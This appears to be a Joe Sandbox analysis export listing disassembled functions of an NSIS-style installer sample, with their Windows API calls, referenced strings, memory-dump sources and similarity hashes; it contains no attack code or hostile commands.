SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63

Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2

WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
GlobalFree.KERNEL32(00000000), ref: 00406C7E
CloseHandle.KERNEL32(?), ref: 00406C88

Strings

NUL, xrefs: 00406ACA
^F, xrefs: 00406ACF
[Rename], xrefs: 00406BF4, 00406C03
%s=%s, xrefs: 00406B6F
plF, xrefs: 00406B54

Memory Dump Source

Source File: 00000000.00000002.1393458130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1393433736.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393481459.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393645808.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QIo3SytSZA.jbxd

Similarity

API ID: File$ByteCharCloseGlobalHandleMulusermePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
String ID: ^F$%s=%s$NUL$[Rename]$plF
API String ID: 565278875-3368763019
Opcode ID: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
Instruction ID: 187392fb1a539ff374a899d42f74550c270b9899c721d3c7d9f4fe98b52eb23c
Opcode Fuzzy Hash: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
Instruction Fuzzy Hash: F2414B322082197FE7206B61DD4CE6F3E6CDF4A758B12013AF586F21D1D6399C10867E

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010D8
FillRect.USER32(00000000,?,00000000), ref: 004010ED
DeleteObject.GDI32(?), ref: 004010F6
CreateFontIndirectW.GDI32(?), ref: 0040110E
SetBkMode.GDI32(00000000,00000001), ref: 0040112F
SetTextColor.GDI32(00000000,000000FF), ref: 00401139
SelectObject.GDI32(00000000,?), ref: 00401149
DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
SelectObject.GDI32(00000000,00000000), ref: 00401169
DeleteObject.GDI32(?), ref: 0040116E
EndPaint.USER32(?,?), ref: 00401177

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.1393458130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1393433736.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393481459.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393645808.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QIo3SytSZA.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
Instruction ID: 3a901b8e11bd10f40e8c3d59bf329074d7a31f92ad936af625f7db958ebfa50f
Opcode Fuzzy Hash: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
Instruction Fuzzy Hash: BF518772800209AFCF05CF95DD459AFBBB9FF45315F00802AF952AA1A1C738EA50DFA4

Function 00402880 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 131registrystringCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
RegCloseKey.ADVAPI32(?), ref: 004029E4

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Strings

WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
WriteReg: error creating key "%s\%s", xrefs: 004029F5

Memory Dump Source

Source File: 00000000.00000002.1393458130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1393433736.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393481459.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393645808.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QIo3SytSZA.jbxd

Similarity

API ID: lstrlen$CloseCreateValuewvsprintf
String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
API String ID: 1641139501-220328614
Opcode ID: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
Instruction ID: c6ff7831871a22410ebf281ca69ba80d881ba5d3dc99c3f31bea2db7712f227d
Opcode Fuzzy Hash: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
Instruction Fuzzy Hash: EE418BB2D00208BFCF11AF91CD46DEEBB7AEF44344F20807AF605761A2D3794A509B69

Function 00406113 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 72filestringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),0040A678,?,00000000,00000000,?,?,00406300,00000000), ref: 004061C7
lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,00406300,00000000), ref: 004061CE
WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3

Strings

@bG, xrefs: 00406162
RMDir: RemoveDirectory invalid input(""), xrefs: 004061C1, 004061C6, 004061CD, 004061DC

Memory Dump Source

Source File: 00000000.00000002.1393458130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1393433736.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393481459.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393645808.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QIo3SytSZA.jbxd

Similarity

API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
String ID: @bG$RMDir: RemoveDirectory invalid input("")
API String ID: 3734993849-3206598305
Opcode ID: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
Instruction ID: 195d9f7db6fc7c0c2d4377fc833027156c916e626c5a885f84869a8699de3d55
Opcode Fuzzy Hash: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
Instruction Fuzzy Hash: 0121C271500240EBD710ABA8DD88D9B3B6CEB06334B118336F52ABA1E1D7389D85C7AC

Function 00402E55 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
GlobalFree.KERNEL32(00000000), ref: 00402F17
CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
DeleteFileW.KERNEL32(?), ref: 00402F56

Strings

created uninstaller: %d, "%s", xrefs: 00402F3B

Memory Dump Source

Source File: 00000000.00000002.1393458130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1393433736.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393481459.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393645808.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QIo3SytSZA.jbxd

Similarity

API ID: Global$AllocFileFree$CloseDeleteHandleWrite
String ID: created uninstaller: %d, "%s"
API String ID: 3294113728-3145124454
Opcode ID: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
Instruction ID: bd1c3f70b2adfd396ae192ad3b35d3c6df9fc0ba6a3ee2c413e2f7d1cf6bca0f
Opcode Fuzzy Hash: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
Instruction Fuzzy Hash: CF319E72800115ABDB11AFA9CD89DAF7FB9EF08364F10023AF515B61E1C7394E419B98

Function 004023F0 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 83libraryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C

Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00424CAD,76F923A0,00000000), ref: 00404FD6
Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00424CAD,76F923A0,00000000), ref: 00404FE6
Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00424CAD,76F923A0,00000000), ref: 00404FF9
Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
FreeLibrary.KERNEL32(?,?), ref: 004024C3

Strings

Error registering DLL: %s not found in %s, xrefs: 0040249A
`G, xrefs: 0040246E
Error registering DLL: Could not load %s, xrefs: 004024DB
Error registering DLL: Could not initialize OLE, xrefs: 004024F1

Memory Dump Source

Source File: 00000000.00000002.1393458130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1393433736.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393481459.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393645808.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QIo3SytSZA.jbxd

Similarity

API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$`G
API String ID: 1033533793-4193110038
Opcode ID: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
Instruction ID: ac94b2829880799def153f2ab6d9fb01897d962df66ba524602deb4d09d833fb
Opcode Fuzzy Hash: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
Instruction Fuzzy Hash: AE21A635A00215FBDF20AFA1CE49A9D7E71AB44318F30817BF512761E1D6BD4A80DA5D

Function 00403DF6 Relevance: 12.1, APIs: 8, Instructions: 60COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 00403E10
GetSysColor.USER32(00000000), ref: 00403E2C
SetTextColor.GDI32(?,00000000), ref: 00403E38
SetBkMode.GDI32(?,?), ref: 00403E44
GetSysColor.USER32(?), ref: 00403E57
SetBkColor.GDI32(?,?), ref: 00403E67
DeleteObject.GDI32(?), ref: 00403E81
CreateBrushIndirect.GDI32(?), ref: 00403E8B

Memory Dump Source

Source File: 00000000.00000002.1393458130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1393433736.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393481459.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393645808.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QIo3SytSZA.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
Instruction ID: 46e75ec11a9703e62b9e59528547c83071966f0b6f932d53464b5ad1ffaeee7a
Opcode Fuzzy Hash: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
Instruction Fuzzy Hash: CA116371500744ABCB219F78DD08B5BBFF8AF40715F048A2AE895E22A1D738DA44CB94

Function 00402238 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00424CAD,76F923A0,00000000), ref: 00404FD6
Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00424CAD,76F923A0,00000000), ref: 00404FE6
Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00424CAD,76F923A0,00000000), ref: 00404FF9
Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

Part of subcall function 00405C6B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D

WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2

Strings

Exec: command="%s", xrefs: 00402241
Exec: success ("%s"), xrefs: 00402263
Exec: failed createprocess ("%s"), xrefs: 004022C2

Memory Dump Source

Source File: 00000000.00000002.1393458130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1393433736.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393481459.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393645808.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QIo3SytSZA.jbxd

Similarity

API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
API String ID: 2014279497-3433828417
Opcode ID: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
Instruction ID: 042007ee205ef60e30064d08c60082207347e2967af2fac5581f577c4c1081ae
Opcode Fuzzy Hash: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
Instruction Fuzzy Hash: 4E11A332504115EBDB01BFE1DE49AAE3A62EF04324B24807FF502B51D2C7BD4D51DA9D

Function 0040487A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
GetMessagePos.USER32 ref: 0040489D
ScreenToClient.USER32(?,?), ref: 004048B5
SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED

Strings

f, xrefs: 004048C9

Memory Dump Source

Source File: 00000000.00000002.1393458130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1393433736.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393481459.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393645808.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QIo3SytSZA.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
Instruction ID: ebefa7930bdcd0e41c689069c6d494cf412fee4c497549fa98469d3d4217857c
Opcode Fuzzy Hash: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
Instruction Fuzzy Hash: 7A019E72A00219BAEB00DB94CC85BEEBBB8AF44710F10412ABB10B61D0C3B45A058BA4

Function 0040324C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
MulDiv.KERNEL32(00013E00,00000064,000D7F16), ref: 00403295
wsprintfW.USER32 ref: 004032A5
SetWindowTextW.USER32(?,?), ref: 004032B5
SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7

Strings

verifying installer: %d%%, xrefs: 0040329F

Memory Dump Source

Source File: 00000000.00000002.1393458130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1393433736.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393481459.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393645808.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QIo3SytSZA.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
Instruction ID: b5f4dff99bd495ec87a9693a0662ffae913500554fa258d9a040327637eece45
Opcode Fuzzy Hash: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
Instruction Fuzzy Hash: F8014470640109BBEF109F60DC4AFEE3B68AB00309F008439FA05E51E1DB789A55CF58

Function 00406064 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
CharNextW.USER32(?,?,?,00000000), ref: 004060D6
CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF

Strings

*?|<>/":, xrefs: 004060B6

Memory Dump Source

Source File: 00000000.00000002.1393458130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1393433736.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393481459.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393645808.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QIo3SytSZA.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":
API String ID: 589700163-165019052
Opcode ID: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
Instruction ID: be175804d259169a812840791ea7ca7df426672d81dd27f3292f2fdf866f60ab
Opcode Fuzzy Hash: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
Instruction Fuzzy Hash: E311C81188022159DB30FB698C4497776F8AE55750716843FE9CAF32C1E7BCDC9182BD

Function 00401EB9 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 78COMMON

Download Yara Rule

APIs

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

GlobalFree.KERNEL32(00000000), ref: 00402387

Strings

Exch: stack < %d elements, xrefs: 00401ED8
SpecialtiesThrownOptics, xrefs: 00401EFB, 00401F00, 00401F1A
Pop: stack empty, xrefs: 00401F2C

Memory Dump Source

Source File: 00000000.00000002.1393458130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1393433736.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393481459.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393645808.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QIo3SytSZA.jbxd

Similarity

API ID: FreeGloballstrcpyn
String ID: Exch: stack < %d elements$Pop: stack empty$SpecialtiesThrownOptics
API String ID: 1459762280-3805010065
Opcode ID: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
Instruction ID: 50a08f61e59307d203ec8fda99e8a78aa4432658e9e299f93ea532572e85a124
Opcode Fuzzy Hash: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
Instruction Fuzzy Hash: 4921FF72640001EBD710EF98DD81A6E77A8AA04358720413BF503F32E1DB799C11966D

Function 0040149D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
RegCloseKey.ADVAPI32(?), ref: 00401504
RegCloseKey.ADVAPI32(?), ref: 00401529
RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547

Memory Dump Source

Source File: 00000000.00000002.1393458130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1393433736.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393481459.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
